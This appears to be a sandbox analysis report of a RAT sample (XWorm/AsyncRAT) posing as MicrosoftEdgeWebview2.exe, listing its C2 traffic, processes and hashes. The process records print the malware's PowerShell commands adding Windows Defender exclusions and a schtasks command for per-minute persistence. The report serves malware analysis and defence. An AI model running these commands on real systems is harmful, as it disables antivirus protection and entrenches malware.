            Aug 30, 2024 07:20:00.143558025 CEST | 15883 | 49739 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:20:02.038105011 CEST | 15883 | 49739 | 147.185.221.20 | 192.168.2.4
            Aug 30, 2024 07:20:02.038161993 CEST | 49739 | 15883 | 192.168.2.4 | 147.185.221.20
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Aug 30, 2024 07:18:55.496432066 CEST | 50203 | 53 | 192.168.2.4 | 1.1.1.1
            Aug 30, 2024 07:18:55.509171009 CEST | 53 | 50203 | 1.1.1.1 | 192.168.2.4
            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
            Aug 30, 2024 07:18:55.496432066 CEST | 192.168.2.4 | 1.1.1.1 | 0xace2 | Standard query (0) | on-weighted.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
            Aug 30, 2024 07:18:55.509171009 CEST | 1.1.1.1 | 192.168.2.4 | 0xace2 | No error (0) | on-weighted.gl.at.ply.gg | | 147.185.221.20 | A (IP address) | IN (0x0001) | false


            Target ID:0
            Start time:01:17:55
            Start date:30/08/2024
            Path:C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe"
            Imagebase:0x8e0000
            File size:64'000 bytes
            MD5 hash:51A89F27AFE7C3B57D5CDAD473178934
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1661069038.00000000008E2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1661069038.00000000008E2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
            Reputation:low
            Has exited:false

            Target ID:1
            Start time:01:17:58
            Start date:30/08/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe'
            Imagebase:0x7ff788560000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:2
            Start time:01:17:58
            Start date:30/08/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:4
            Start time:01:18:05
            Start date:30/08/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftEdgeWebview2.exe'
            Imagebase:0x7ff788560000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:5
            Start time:01:18:05
            Start date:30/08/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:7
            Start time:01:18:15
            Start date:30/08/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe'
            Imagebase:0x7ff788560000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:8
            Start time:01:18:15
            Start date:30/08/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:11
            Start time:01:18:29
            Start date:30/08/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftEdgeWebview2.exe'
            Imagebase:0x7ff788560000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:12
            Start time:01:18:29
            Start date:30/08/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:13
            Start time:01:18:50
            Start date:30/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeWebview2" /tr "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe"
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:14
            Start time:01:18:50
            Start date:30/08/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:15
            Start time:01:18:51
            Start date:30/08/2024
            Path:C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Wow64 process (32bit):false
            Commandline:C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Imagebase:0xa80000
            File size:64'000 bytes
            MD5 hash:51A89F27AFE7C3B57D5CDAD473178934
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, Author: Joe Security
            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, Author: ditekSHen
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 82%, ReversingLabs
            • Detection: 69%, Virustotal, Browse
            Reputation:low
            Has exited:true

            Target ID:16
            Start time:01:18:59
            Start date:30/08/2024
            Path:C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe"
            Imagebase:0x5e0000
            File size:64'000 bytes
            MD5 hash:51A89F27AFE7C3B57D5CDAD473178934
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:17
            Start time:01:19:01
            Start date:30/08/2024
            Path:C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Wow64 process (32bit):false
            Commandline:C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Imagebase:0xd00000
            File size:64'000 bytes
            MD5 hash:51A89F27AFE7C3B57D5CDAD473178934
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:18
            Start time:01:19:07
            Start date:30/08/2024
            Path:C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe"
            Imagebase:0x680000
            File size:64'000 bytes
            MD5 hash:51A89F27AFE7C3B57D5CDAD473178934
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:20
            Start time:01:20:00
            Start date:30/08/2024
            Path:C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Wow64 process (32bit):false
            Commandline:C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Imagebase:0x7c0000
            File size:64'000 bytes
            MD5 hash:51A89F27AFE7C3B57D5CDAD473178934
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false


              Execution Graph

              Execution Coverage:21.9%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:0%
              Total number of Nodes:6
              Total number of Limit Nodes:0
              execution_graph
              • Node 4175: 7ffd9b6d2e58
              • Node 4178: 7ffd9b6d2e61 SetWindowsHookExW (edge 4175 -> 4178)
              • Node 4177: 7ffd9b6d2f31 (edge 4178 -> 4177)
              • Node 4179: 7ffd9b6d290d
              • Node 4180: 7ffd9b6d293f RtlSetProcessIsCritical (edge 4179 -> 4180)
              • Node 4182: 7ffd9b6d29f2 (edge 4180 -> 4182)

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2962720771.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID: CAM_^
              • API String ID: 0-3136481660
              • Opcode ID: 5d4a6cec4192fc7d71674e47685700370935643d1236e722b4bab410bc47a8d5
              • Instruction ID: 742938695245372f865bd3ff9ca56fac162cd50ad9ffaa4bd3764d25f2f8ad76
              • Opcode Fuzzy Hash: 5d4a6cec4192fc7d71674e47685700370935643d1236e722b4bab410bc47a8d5
              • Instruction Fuzzy Hash: 4942D631B19A4D4FE7A8EB788876AB977D2FF98300F440579E41EC72D6DE28B9018741

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 347 7ffd9b6d90d6-7ffd9b6d90e3 348 7ffd9b6d90e5-7ffd9b6d90ed 347->348 349 7ffd9b6d90ee-7ffd9b6d91b7 347->349 348->349 354 7ffd9b6d91b9-7ffd9b6d91c2 349->354 355 7ffd9b6d9223 349->355 354->355 357 7ffd9b6d91c4-7ffd9b6d91d0 354->357 356 7ffd9b6d9225-7ffd9b6d924a 355->356 364 7ffd9b6d924c-7ffd9b6d9255 356->364 365 7ffd9b6d92b6 356->365 358 7ffd9b6d9209-7ffd9b6d9221 357->358 359 7ffd9b6d91d2-7ffd9b6d91e4 357->359 358->356 361 7ffd9b6d91e6 359->361 362 7ffd9b6d91e8-7ffd9b6d91fb 359->362 361->362 362->362 363 7ffd9b6d91fd-7ffd9b6d9205 362->363 363->358 364->365 366 7ffd9b6d9257-7ffd9b6d9263 364->366 367 7ffd9b6d92b8-7ffd9b6d9360 365->367 368 7ffd9b6d929c-7ffd9b6d92b4 366->368 369 7ffd9b6d9265-7ffd9b6d9277 366->369 378 7ffd9b6d9362-7ffd9b6d936c 367->378 379 7ffd9b6d93ce 367->379 368->367 371 7ffd9b6d9279 369->371 372 7ffd9b6d927b-7ffd9b6d928e 369->372 371->372 372->372 374 7ffd9b6d9290-7ffd9b6d9298 372->374 374->368 378->379 380 7ffd9b6d936e-7ffd9b6d937b 378->380 381 7ffd9b6d93d0-7ffd9b6d93f9 379->381 382 7ffd9b6d93b4-7ffd9b6d93cc 380->382 383 7ffd9b6d937d-7ffd9b6d938f 380->383 387 7ffd9b6d93fb-7ffd9b6d9406 381->387 388 7ffd9b6d9463 381->388 382->381 385 7ffd9b6d9391 383->385 386 7ffd9b6d9393-7ffd9b6d93a6 383->386 385->386 386->386 389 7ffd9b6d93a8-7ffd9b6d93b0 386->389 387->388 390 7ffd9b6d9408-7ffd9b6d9416 387->390 391 7ffd9b6d9465-7ffd9b6d94f6 388->391 389->382 392 7ffd9b6d9418-7ffd9b6d942a 390->392 393 7ffd9b6d944f-7ffd9b6d9461 390->393 399 7ffd9b6d94fc-7ffd9b6d950b 391->399 394 7ffd9b6d942c 392->394 395 7ffd9b6d942e-7ffd9b6d9441 392->395 393->391 394->395 395->395 397 7ffd9b6d9443-7ffd9b6d944b 395->397 397->393 400 7ffd9b6d9513-7ffd9b6d9578 call 7ffd9b6d9594 399->400 401 7ffd9b6d950d 399->401 409 7ffd9b6d957a 400->409 410 7ffd9b6d957f-7ffd9b6d9593 400->410 401->400 409->410
              Memory Dump Source
              • Source File: 00000000.00000002.2962720771.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d59e849418843406f266aaee37fd2aa9af29c490897cdd93222e6a84c8752a2b
              • Instruction ID: 912170421a648166c20c20b6fd29fb34fe472fcffe3776f61129d346c64b3947
              • Opcode Fuzzy Hash: d59e849418843406f266aaee37fd2aa9af29c490897cdd93222e6a84c8752a2b
              • Instruction Fuzzy Hash: FEF19430A19A8D8FEBA8DF28CC597E937D1FF95310F04426AE85DC72D5DB34A9418B81

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 411 7ffd9b6d9e82-7ffd9b6d9e8f 412 7ffd9b6d9e9a-7ffd9b6d9f67 411->412 413 7ffd9b6d9e91-7ffd9b6d9e99 411->413 418 7ffd9b6d9f69-7ffd9b6d9f72 412->418 419 7ffd9b6d9fd3 412->419 413->412 418->419 421 7ffd9b6d9f74-7ffd9b6d9f80 418->421 420 7ffd9b6d9fd5-7ffd9b6d9ffa 419->420 427 7ffd9b6d9ffc-7ffd9b6da005 420->427 428 7ffd9b6da066 420->428 422 7ffd9b6d9fb9-7ffd9b6d9fd1 421->422 423 7ffd9b6d9f82-7ffd9b6d9f94 421->423 422->420 425 7ffd9b6d9f96 423->425 426 7ffd9b6d9f98-7ffd9b6d9fab 423->426 425->426 426->426 429 7ffd9b6d9fad-7ffd9b6d9fb5 426->429 427->428 430 7ffd9b6da007-7ffd9b6da013 427->430 431 7ffd9b6da068-7ffd9b6da08d 428->431 429->422 432 7ffd9b6da04c-7ffd9b6da064 430->432 433 7ffd9b6da015-7ffd9b6da027 430->433 438 7ffd9b6da0fb 431->438 439 7ffd9b6da08f-7ffd9b6da099 431->439 432->431 434 7ffd9b6da029 433->434 435 7ffd9b6da02b-7ffd9b6da03e 433->435 434->435 435->435 437 7ffd9b6da040-7ffd9b6da048 435->437 437->432 440 7ffd9b6da0fd-7ffd9b6da12b 438->440 439->438 441 7ffd9b6da09b-7ffd9b6da0a8 439->441 448 7ffd9b6da19b 440->448 449 7ffd9b6da12d-7ffd9b6da138 440->449 442 7ffd9b6da0aa-7ffd9b6da0bc 441->442 443 7ffd9b6da0e1-7ffd9b6da0f9 441->443 444 7ffd9b6da0be 442->444 445 7ffd9b6da0c0-7ffd9b6da0d3 442->445 443->440 444->445 445->445 447 7ffd9b6da0d5-7ffd9b6da0dd 445->447 447->443 450 7ffd9b6da19d-7ffd9b6da275 448->450 449->448 451 7ffd9b6da13a-7ffd9b6da148 449->451 461 7ffd9b6da27b-7ffd9b6da28a 450->461 452 7ffd9b6da14a-7ffd9b6da15c 451->452 453 7ffd9b6da181-7ffd9b6da199 451->453 455 7ffd9b6da15e 452->455 456 7ffd9b6da160-7ffd9b6da173 452->456 453->450 455->456 456->456 458 7ffd9b6da175-7ffd9b6da17d 456->458 458->453 462 7ffd9b6da28c 461->462 463 7ffd9b6da292-7ffd9b6da2f4 call 7ffd9b6da310 461->463 462->463 471 7ffd9b6da2fb-7ffd9b6da30f 463->471 472 7ffd9b6da2f6 463->472 472->471
              Memory Dump Source
              • Source File: 00000000.00000002.2962720771.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 46883effe899b06bab4aff86d38741991b13acf0dfece6966aa196bec12566cd
              • Instruction ID: e6a0f111735260e62ed94bd5631d892dac468fbddd36c6be498fb3b83079cc57
              • Opcode Fuzzy Hash: 46883effe899b06bab4aff86d38741991b13acf0dfece6966aa196bec12566cd
              • Instruction Fuzzy Hash: 4DE1B230A0DA4D8FEBA8DF28CC657E977D1FB95310F04826ED85DC7295DE74A9808B81
              Memory Dump Source
              • Source File: 00000000.00000002.2962720771.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2cbe38d0c0249377a907932814ea866782218969e8ab90f6eef66429d565a35a
              • Instruction ID: 1317ceff7520a40090ac761716204bbee304aeff766f1d06cf3a1fc6d2316d99
              • Opcode Fuzzy Hash: 2cbe38d0c0249377a907932814ea866782218969e8ab90f6eef66429d565a35a
              • Instruction Fuzzy Hash: 85912B62B1EA4D0FE7649F6C8CB96B937C1FF99740F05067DD459CB2E2DE18B9018281
              Memory Dump Source
              • Source File: 00000000.00000002.2962720771.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 31c70019bd5af427d734c36e24a8ef2ef3aa21208debe9fa19ccdc6480f2a24f
              • Instruction ID: 0ded79d36f6159772e8f0f347bfa40929dde7909f157398c2decf7c8c25a32fc
              • Opcode Fuzzy Hash: 31c70019bd5af427d734c36e24a8ef2ef3aa21208debe9fa19ccdc6480f2a24f
              • Instruction Fuzzy Hash: B551D021B0E6C90FE79AABB848756757FE1DF87215B0801FAE09DCB1E7DD486806C342

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph
              • Block 183: 7ffd9b6d290d-7ffd9b6d29f0 RtlSetProcessIsCritical (edges 183 -> 187, 183 -> 188)
              • Block 187: 7ffd9b6d29f8-7ffd9b6d2a2d
              • Block 188: 7ffd9b6d29f2 (edge 188 -> 187)
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2962720771.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID: CriticalProcess
              • String ID:
              • API String ID: 2695349919-0
              • Opcode ID: 386fd86b7b75fc6d72f4c468f58efd54d9af39b729b48b28106fdc90a2ffbb8a
              • Instruction ID: dc8e7c2b9f7378dc33c4e718ce97408a5d07ce11d2469590a0511dbfea153264
              • Opcode Fuzzy Hash: 386fd86b7b75fc6d72f4c468f58efd54d9af39b729b48b28106fdc90a2ffbb8a
              • Instruction Fuzzy Hash: 6041E33190C6488FD718DFA8D855BE9BBF0FF56311F04416FE09AC7692CB646846CB91

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph
              • Block 190: 7ffd9b6d2e58-7ffd9b6d2e5f (edges 190 -> 191, 190 -> 192)
              • Block 191: 7ffd9b6d2e6a-7ffd9b6d2edd (edges 191 -> 196, 191 -> 197)
              • Block 192: 7ffd9b6d2e61-7ffd9b6d2e69 (edge 192 -> 191)
              • Block 196: 7ffd9b6d2f69-7ffd9b6d2f6d (edge 196 -> 198)
              • Block 197: 7ffd9b6d2ee3-7ffd9b6d2ee8 (edge 197 -> 201)
              • Block 198: 7ffd9b6d2ef2-7ffd9b6d2f2f SetWindowsHookExW (edges 198 -> 199, 198 -> 200)
              • Block 199: 7ffd9b6d2f37-7ffd9b6d2f68
              • Block 200: 7ffd9b6d2f31 (edge 200 -> 199)
              • Block 201: 7ffd9b6d2eef-7ffd9b6d2ef0 (edge 201 -> 198)
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2962720771.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID: HookWindows
              • String ID:
              • API String ID: 2559412058-0
              • Opcode ID: 270d64c5623fe875af84244b609f9a7447b7ca1ea672827cf9dc62121733c5a5
              • Instruction ID: b020915d214fa010e840a32324c0e3fc060515883f2eb1d82f962023bdabe12b
              • Opcode Fuzzy Hash: 270d64c5623fe875af84244b609f9a7447b7ca1ea672827cf9dc62121733c5a5
              • Instruction Fuzzy Hash: 7D41F330E1CA4C4FDB58DBA8D8566F9BBE1EB99321F00427ED059C3292CA64A81287C1
              Memory Dump Source
              • Source File: 00000001.00000002.1759203410.00007FFD9B7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b7b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 62eae987bbdc690ec91791d528152765146bbe444a1f11bc6ca2a69a7bb7f42e
              • Instruction ID: 1d2cbea2e68ff67ca297e39c91b9bff9539b555f3e784affa52bbbd95838067a
              • Opcode Fuzzy Hash: 62eae987bbdc690ec91791d528152765146bbe444a1f11bc6ca2a69a7bb7f42e
              • Instruction Fuzzy Hash: A7C16772B0FB9E4FEB64AAA848655B9BBD0EF55314B0402BED55DC70F3DA18ED008B41
              Memory Dump Source
              • Source File: 00000001.00000002.1758865250.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b6e0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 919a62e9b00c1869a41b27643e3a70de91c9b9f5758462ea9670b6477a4f3380
              • Instruction ID: 32085953041aa6737cf9c9fc13d3f641fb1b42e349f745edc82b2a5ad42de9ce
              • Opcode Fuzzy Hash: 919a62e9b00c1869a41b27643e3a70de91c9b9f5758462ea9670b6477a4f3380
              • Instruction Fuzzy Hash: DD31F971A1CB4C8FDB589F5C984A6A977E0FB99310F00412FE449D3292DB30B915CBC2
              Memory Dump Source
              • Source File: 00000001.00000002.1758512600.00007FFD9B5CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5CD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b5cd000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a22a53c60f617a6ceffaf5ea7a614785cbd138539e139ebbfde3c255edf2038e
              • Instruction ID: 6878243793a124cbdce86e761d71bc30e3ad9f6b3ce829adfced5a5c1e5dd6c8
              • Opcode Fuzzy Hash: a22a53c60f617a6ceffaf5ea7a614785cbd138539e139ebbfde3c255edf2038e
              • Instruction Fuzzy Hash: 56414B7140EBC44FD7679B2898559623FF1EF52320B1646EFD088CB1A3D625F846C792
              Memory Dump Source
              • Source File: 00000001.00000002.1758865250.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b6e0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4e3ac8908a30d30492e3087ab01c87ee2c907e1d347895c9b9f7d49f3b0471ff
              • Instruction ID: c23d0c4a1e1f5940419f657195145af9dc4f7b05e45a3b15fa8a69b7d196b8df
              • Opcode Fuzzy Hash: 4e3ac8908a30d30492e3087ab01c87ee2c907e1d347895c9b9f7d49f3b0471ff
              • Instruction Fuzzy Hash: D421F83190C74C4FDB59DFAC984A7E97BF0EBA6321F04416BD049C7152CA74A41ACB91
              Memory Dump Source
              • Source File: 00000001.00000002.1758865250.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b6e0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
              • Instruction ID: 22b824bd88e2b6d48dd14a292a13bac9666b236c475e49cbd940d246467ebbe2
              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
              • Instruction Fuzzy Hash: F401A73020CB0C4FD748EF0CE051AA6B3E0FB85364F10056EE58AC36A1DA32E882CB41
              Memory Dump Source
              • Source File: 00000001.00000002.1759203410.00007FFD9B7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b7b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a734f351b205bcdf5a1f3d48d66ae210a9f5d4f2cf6b68fb14088438301f8c86
              • Instruction ID: 080743534fa19e95236cb188e9c83a5075b740dff5686f517874d8e479fda579
              • Opcode Fuzzy Hash: a734f351b205bcdf5a1f3d48d66ae210a9f5d4f2cf6b68fb14088438301f8c86
              • Instruction Fuzzy Hash: 2AF0BE32B0E6498FD769EA8CE4558A873E0EF55320B1600BAE06DC71B3CA25EC40CB45
              Memory Dump Source
              • Source File: 00000001.00000002.1759203410.00007FFD9B7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b7b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0ce8b8661839b5ceef80a66c0bee97d682b1e95622006f93ee3a5459ee7a3316
              • Instruction ID: a12d77880c4913e9036b2c2c587c7f2558c83b239aece8234214539db92b1fe6
              • Opcode Fuzzy Hash: 0ce8b8661839b5ceef80a66c0bee97d682b1e95622006f93ee3a5459ee7a3316
              • Instruction Fuzzy Hash: 59F0BE32A0E6498FDB68EA4CE4648A8B7E0FF0532074600BAE05DC70B3CA25AC50CB40
              Memory Dump Source
              • Source File: 00000001.00000002.1759203410.00007FFD9B7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b7b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
              • Instruction ID: d2fdef9f9d8698a3263587d2135c568bf769876d187644258486c0ea47f6f652
              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
              • Instruction Fuzzy Hash: 5EE01A31B0C91C9FDA78DA4CE0559A973E1EB98321B1202BBD14EC7571CA22ED518F81
              Memory Dump Source
              • Source File: 00000001.00000002.1758865250.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b6e0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c49449d2ac0313692a40979fe80b4a1ee3da1bfde7ffe00faa70c4389504a3a1
              • Instruction ID: f0afa1b50100a7561f4a67eef4b7d96d9ba89fcabe09da6dfc75c24aafefb342
              • Opcode Fuzzy Hash: c49449d2ac0313692a40979fe80b4a1ee3da1bfde7ffe00faa70c4389504a3a1
